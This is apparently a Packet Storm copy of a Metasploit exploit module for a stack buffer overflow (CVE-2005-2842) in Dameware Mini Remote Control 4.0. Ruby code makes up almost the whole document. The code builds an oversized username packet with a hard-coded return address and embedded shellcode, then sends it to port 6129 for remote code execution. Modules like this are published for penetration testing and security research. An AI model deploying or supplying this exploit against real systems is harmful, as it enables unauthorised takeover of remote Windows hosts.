
Dameware Mini Remote Control 4.0 Username Stack Buffer Overflow

2017-09-15 00:00:00
James Fitts
packetstormsecurity.com

EPSS

0.745

Percentile

98.2%

`require 'msf/core'  
  
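class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Every string field written into the two DWRCS requests below is 259 bytes long.
  FIELD_LEN = 259
  # Offsets inside the username field: where the saved return address is
  # overwritten, and where the encoded payload begins.
  RET_OFFSET = 100
  PAYLOAD_OFFSET = 108

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack based buffer overflow vulnerability found
        in Dameware Mini Remote Control v4.0. The overflow is caused when sending
        an overly long username to the DWRCS executable listening on port 6129.
        The username is read into a strcpy() function causing an overwrite of
        the return pointer leading to arbitrary code execution.
      },
      'Author'         => [ 'James Fitts' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-2842' ],
          [ 'BID', '14707' ],
          [ 'URL', 'http://secunia.com/advisories/16655' ],
          [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          # The payload starts at PAYLOAD_OFFSET inside a FIELD_LEN-byte field;
          # 140 bytes keeps it inside the field (108 + 140 <= 259).
          'Space'           => 140,
          'BadChars'        => "\x00\x0a\x0d",
          # Presumably moves esp away from the payload before the decoder runs.
          'StackAdjustment' => -3500,
          # jmp / pop ecx / jmp / call GetPC stub prepended to the encoded payload.
          'PrependEncoder'  => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'Compat'          =>
            {
              'SymbolLookup' => '+ws2ord'
            }
        },
      'Platform'       => 'win',
      # Single hard-coded target and no check method: the return address is a
      # fixed msvcrt.dll gadget for Windows XP SP3 EN. Against any other build
      # the overwritten return address is most likely wrong and the DWRCS
      # service will probably crash instead of returning a session.
      'Targets'        =>
        [
          [
            'Windows XP SP3 EN',
            {
              # msvcrt.dll: push esp / retn
              'Ret' => 0x77c35459
            }
          ]
        ],
      'DefaultTarget'  => 0,
      # Framework convention is a three-letter month abbreviation ('%b %d %Y');
      # the original 'Sept 01 2005' does not match it.
      'DisclosureDate' => 'Sep 01 2005'))

    register_options(
      [
        Opt::RPORT(6129)
      ])
  end

  # Builds the first request, whose username field overflows the stack.
  #
  # Layout of the username field (offsets relative to its start at byte 456):
  #   0..99    filler (0x43)
  #   100..103 target return address (push esp / retn gadget)
  #   104..107 filler (0x43); if the gadget returns into the bytes right after
  #            the saved return address, these execute as `inc ebx` before the
  #            payload is reached
  #   108..    encoded payload (bounded by the Payload Space of 140 bytes)
  #
  # The other five string fields are filled with random alphabetic text. The
  # header constants are reproduced from the original exploit; their meaning
  # in the DWRCS protocol is not documented here. Bytes not written explicitly
  # are zero, so the zero-filled words at offsets 4 and 16..35 need no
  # separate assignment.
  #
  # @return [String] the complete 4056-byte request
  def pkt1
    shellcode = payload.encoded

    # Payload Space already bounds this, but guard the layout explicitly: a
    # longer payload would grow the username past FIELD_LEN and shift every
    # field that follows it in the packet.
    if shellcode.length > FIELD_LEN - PAYLOAD_OFFSET
      fail_with(Failure::BadConfig, "Payload too large for the username field")
    end

    username = "\x43" * FIELD_LEN
    username[RET_OFFSET, 4] = [target.ret].pack('V')
    username[PAYLOAD_OFFSET, shellcode.length] = shellcode

    packet = "\x00" * 4056
    packet[0, 4]  = "\x30\x11\x00\x00"
    packet[8, 4]  = "\xd7\xa3\x70\x3d"
    packet[12, 4] = "\x0a\xd7\x0d\x40"
    packet[36, 4] = [1].pack('V')
    packet[40, 4] = [0x00002710].pack('V')

    packet[196, FIELD_LEN] = rand_text_alpha(FIELD_LEN)
    packet[456, FIELD_LEN] = username
    [716, 976, 1236, 1496].each do |offset|
      packet[offset, FIELD_LEN] = rand_text_alpha(FIELD_LEN)
    end

    packet
  end

  # Builds the second request, sent after the server answers the first. Its
  # only non-zero content is a random 259-byte string at offset 756.
  #
  # @return [String] the complete 4096-byte request
  def pkt2
    packet = "\x00" * 4096
    packet[756, FIELD_LEN] = rand_text_alpha(FIELD_LEN)
    packet
  end

  # Sends both requests and hands off to the payload handler. The server's
  # replies are read but not interpreted.
  def exploit
    connect

    print_status("Sending login request with #{FIELD_LEN}-byte username...")
    sock.put(pkt1)
    sock.recv(1024)

    print_status("Sending second request...")
    sock.put(pkt2)
    sock.recv(84)

    handler
    disconnect
  end

end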
__END__  
  
`
